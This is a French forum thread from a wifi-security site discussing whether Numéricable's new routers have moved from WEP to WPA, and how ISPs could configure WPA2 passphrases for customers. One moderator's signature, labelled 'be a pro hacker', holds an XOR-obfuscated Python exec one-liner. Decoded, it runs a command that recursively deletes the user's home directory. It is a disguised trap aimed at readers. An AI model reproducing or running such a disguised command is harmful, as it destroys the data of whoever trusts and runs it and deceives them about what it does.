Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-05-2012 21:06:18

koala
Membre d'honneur
Lieu : In the sky

Numéricable enfin au WPA?

Coucou wink

Il semble que numéricable est sorti une nouvelle box, jusqu'a présent le WEP était présent sur les vielles Livebox sagem, alice-XXXXXX, speedtouch_XXXXXX et quasiment toutes les boxs numéricable.Il semble enfin d'après l'une de mes connaissance qui travaille dans le hardware que les nouvelles box sont belle et bien en WPA ( ouf celle la on l'attendait depuis longtemps wink ).
J'attend vos confirmation ou infirmation sur le sujet par curiosité.Si oui, La fin du WEP est bel est bien signer on dirait smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-05-2012 09:28:25

spawn
Modérateur

Re : Numéricable enfin au WPA?

Certains équipements qui datent un peu ne supportent que le WEP pour des raisons matérielles.
N'autoriser que le WPA serait un sublime exemple d'obsolescence forcée.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 29-05-2012 12:27:39

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : Numéricable enfin au WPA?

Je te rejoins la dessus: ce qui compte c'est que la configuration du pass ne soit pas WEP par défaut et que les entreprises prennent le temps d'informer les clients lorsqu'elles passent installer Internet.
On pourrait imaginer que les techniciens viennent avec des étiquettes et une petite imprimante et prennent 5 minutes avec le client pour faire une configuration du pass et ssid personnalisée et expliquer pourquoi.
Et hop, on collerait la petite étiquette sur celle qui est mise sous le routeur en sortie d'usine...
Je sais bien que la Grèce n'est pas citée en exemple ces temps ci (les pauvres, pas marrant ce qu'ils sont en train de se bouffer...)
Niveau Internet ils avaient pris dans mon appart la compagnie la moins chère, pour 10 € tu as un contrat de base (10 mbps) avec un routeur thomson N pas trop mauvais et surtout, ce que j'avais vraiment apprécié, c'était le fait que les techniciens viennent chez toi et t'expliquent comment choisir un bon pass WPA2  et installent ta ligne en y mettant ton pass et en te faisant choisir un SSID et te donnent 5-6 jolies étiquettes bien imprimées avec les détails pour en mettre sur ton frigo, dans ton calepin, dans le coffre fort à Mémé etc....
La bande passant n'était pas énorme mais rien à redire sur la qualie deu service et de la mise en fonctionnement, j'aimerai bien retrouver ce professionnalisme chez nos grandes compagnies si compétentes avec leurs triples A.
Parce que s'il existait la même chose pour noter la qualité et la sécurité du service, il y a des triples Z qui se perdraient dans les airs!

Annonce